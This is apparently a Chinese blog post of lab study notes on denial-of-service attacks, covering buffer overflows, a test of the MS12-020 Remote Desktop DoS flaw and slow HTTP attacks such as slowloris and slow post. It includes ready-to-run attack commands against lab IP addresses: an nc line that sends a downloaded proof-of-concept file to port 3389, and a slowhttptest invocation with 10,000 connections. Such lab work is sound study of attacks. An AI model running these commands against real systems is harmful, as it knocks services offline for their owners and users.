1、应用服务漏洞
- 服务代码存在漏洞,遇异常提交数据时程序崩溃
- 应用处理大量并发请求能力有限,被拒绝的是应用或OS
2、缓冲区溢出漏洞
- 向目标函数随机提交数据,特定情况下数据覆盖临近寄存器或内存
- 影响:远程代码执行、DoS
- 利用模糊测试方法发现缓冲区溢出漏洞
3、测试 MS12-020远程桌面协议DOS漏洞
![](https://img.haomeiwen.com/i4593121/991c8bcbb4ceb552.png)
在18606.txt中查看其说明,
http://aluigi.altervista.org/poc/termdd_1.dat
在此路径下,下载文件,然后按照说明执行windows xp开启3389端口,然后执行
nc 192.168.50.185 3389 < termdd_1.dat
进行多次测试![](https://img.haomeiwen.com/i4593121/346b532157155460.png)
![](https://img.haomeiwen.com/i4593121/5f2e28fff876ff18.png)
![](https://img.haomeiwen.com/i4593121/0fc9e2ed8640af95.png)
![](https://img.haomeiwen.com/i4593121/6a3f66d96d8da191.png)
4、slowhttptest(源自google)
- 低带宽应用层慢速DoS攻击(相对于CC等快速攻击而言的慢速)
- 最早由Python编写,跨平台支持(linux、win、cygwin、osx)
- 尤其擅长攻击apache、tomcat,对windows的IIS几乎无效
- 大量应用服务器和安全设备都无法防护慢速攻击
攻击方法 - 耗尽应用的并发连接池,类似于http层的synflood
- http协议默认在服务器全部接收请求之后才开始处理,若客户端发送速度缓慢或不完整,服务器时钟为其保留连接资源池占用,此类大量并发将导致Dos
- slowloris:完整的http请求结尾\r\n\r\n(正常情况下),攻击方\r\n(攻击情况下,只发送一个\r\n,服务端一直等待)
- slow post:http头content-length声明长度,但body部分缓慢发送
- slow read attack攻击:与slowloris and slow post目的相同;不同之处在于请求正常发送,但慢速读取响应数据;攻击者调整TCP window窗口大小,是服务器慢速返回数据
- Apache range header attack:客户端传输大文件时,体积超过http body大小限制时进行分段;耗尽服务器CPU、内存资源
5、slowhttptest测试
输入# man slowhttptest
,可以看到四种模式
![](https://img.haomeiwen.com/i4593121/c81f93b2fdd6c8bd.png)
![](https://img.haomeiwen.com/i4593121/19fdda2abef59e6a.png)
# slowhttptest -c 10000 -H -g -o my_header_stats -i 10 -r 1 -t GET -u http://192.168.50.183 -x 24 -p 3 -l 9999999
![](https://img.haomeiwen.com/i4593121/495084618a2f1c0c.png)
![](https://img.haomeiwen.com/i4593121/f112edd2289d4682.png)
![](https://img.haomeiwen.com/i4593121/0146853a29ac5d0a.png)
6、其他拒绝服务
- 使用垃圾邮件塞满邮箱
- 无意识的/非故意的拒绝服务攻击
- 数据库服务器宕机恢复后,引用队列大量请求洪水涌来
- 告警邮件在邮件服务器修改地址后洪水攻击防火墙
网友评论